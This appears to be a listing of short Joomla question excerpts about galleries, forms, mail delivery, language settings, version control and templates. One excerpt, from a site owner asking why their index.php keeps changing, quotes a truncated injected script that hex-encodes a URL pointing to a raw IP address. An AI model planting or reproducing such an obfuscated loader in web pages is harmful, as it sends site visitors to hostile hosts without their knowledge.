joomla

Joomla ImageBrowser Lightbox not working

I've been using an image browser for Joomla called ImageBrowser. It's great - easy uploads, easy for clients to use, even handles zip file uploads. I have Joomla v. 1.5.15 installed and the newest version of this plugin as well on 3 or 4 of our sites with no fuss or issues. Recently, the ImageBrowser on one of our sites started acting s...

A simple php form in Joomla?!

Hi all, Someone came to me and asked me if I could add a form to their Joomla page. I figured this should be easy since Joomla is widely used and such thing should be supported. I'm googling arround for 1,5h now, and I have given 4 formcreators a try but this is driving me crazy. The editors are all very complex for the simplest task I...

Joomla MorfeoShow Fancybox style problem

Hi, I use MorfeoShow gallery for Joomla. Recently I faced strange error while changing gallery style to FancyBox1. I got error: $(".photo-link") is null full line: $(".photo-link").fancybox({ "zoomSp...edOut": 500, "overlayShow": true }); What is the problem ? Maybe script conflicts with other scripts ? .photo_link classes exists. ...

how to create a new joomla component for integrating the google map api

how to create a new joomla component for integrating the google map api ...

Mail not delivered to custom email addresses (e.g. [email protected]) with Joomla

I am running Joomla 1.5.15. After working on my site, I decided to test it with different email addresses to make sure that everyone would be able to register. There was no problem with hotmail, yahoo, gmail, etc but I noticed that when I registered with my company email address, I did not receive any mail asking me to activate my accoun...

MySQL diff generator for use in a Joomla context

Is there any (mysql) db diff tool that can output the differences between 2 dump files (or 2 db) as a series of ddl and dml sql statements? I would like to maintain the db version controlled and so far the 'best' option i've seen is create a initial dump of the database and then put the modifications as a serie of scripts. The problem ...

popular python open source cms like drupal?

i wonder if there is open source cms coded in python that is as big as drupal (joomla or wordpress)? thanks ...

How to allow Joomla Docman to support 1 document for 2 category

Hi, I would like to know how I can add a file/document to two category. So idea on document could go to normal category and the other would to go brand category. For example i have a document would like it to go to remote control category but also would like that same document go to Sony category. ...

How to display the rss version of a News Link

I'm trying to write a script that will show the rss version of a single url (title, author, image, source, etc..). This should behave much the way that facebook does when you copy paste a link to share and it generates this information automatically. I'm trying to do this with a php script but would also be open to opensource programs th...

joomla component error

I have installed a joomla component and its working quite good but i am facing the problem that whenever i am trying to send mail by using the component iam always getting the message "Could not instantiate mail function." Please help me in getting the solution to the problem ...

Website index.php page chnages automatically with one script in the end

I have seen that , this happend twice that , in my root index.php file. I have this thing added <html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace...

simple way to quickly edit my website

here's my website: www.newportclassic.com do you know of any free, easy to use, content management systems, that will allow me to simply edit the text on my site without having to download the file, open the file, edit the code, save the file, upload the file ??????? ...

Force language change from custom account creation script through url

I have made a custom 'Account Creation' script so that users can login from my phone application. What I want is to be able to change the responses from the server depending on their locale. So when I request a page I would add lang=en or lang=zh etc. This works http://mysite.com/phone/my_custom_account_creation.php?lang=en Resp...

tracking visit count of external url in joomla 1.0

i have a website in joomla 1.0. it has some links to external sites (not our domain) is there an easy way to track the hit count? any components? -Vivek ...

Using GIT with Joomla

Hi Guys, We are a web design company going down the road of setting up a revision management system and all the processes around how we are going to use it etc. We mainly develop our websites on a Joomla and what i wanted to know is how other companies manage their repositories when dealing with a CMS. We mainly deal with template bui...

can I use HTML templates in joomla?

I am very new in Joomla.I have to create one simple static applicatin in joomla.Can I use my HTML templates or joomla temlates are diffrent?Where we use PHP in joomla?From where I have to start?means whether I have to create html template first and then move it to joomla OR have to create page template in joomla itself? ...

Joomla modules file structure to store jquery core and some image files.

I'm a newbie to joomla. I'm trying to create a joomla module which uses some jquery actions and some image files. Can anyone suggest me a best method to place the jquery-core and jquery plugin files inside the module. I also wants to add some image files with my module. ...

Converting java language output to Joomla language output

in java if I run : Locale.getDefault().toString() I get zh_tw I am sending this to a joomla site and setting the language like this: $lang = &JFactory::getLanguage(); $lang->setLanguage( $_GET['lang'] ); $lang->load(); however the site requires the following format zh-TW It appears that if it is not in that exact format the langu...

Single sign on in joomla from other applications

Hi, I have two applications, one is developed in dzoic handshakes and the other one in joomla. The registration process is done in dzoic, and a mail will be sending after registration. After verification, I need to make the user to automatically login into the applications. I could able to login the user to dzoic, but not to joomla... H...

Displaying Category Articles in Joomla Home page

Hi guys, I am wondering about displaying categories in home page. I have 5 different categories under 1 section. And All categories have as many articles as they have. Now I want to show the category title and its few articles in home page... I am not sure about which module or component to use OR can we do it self? ...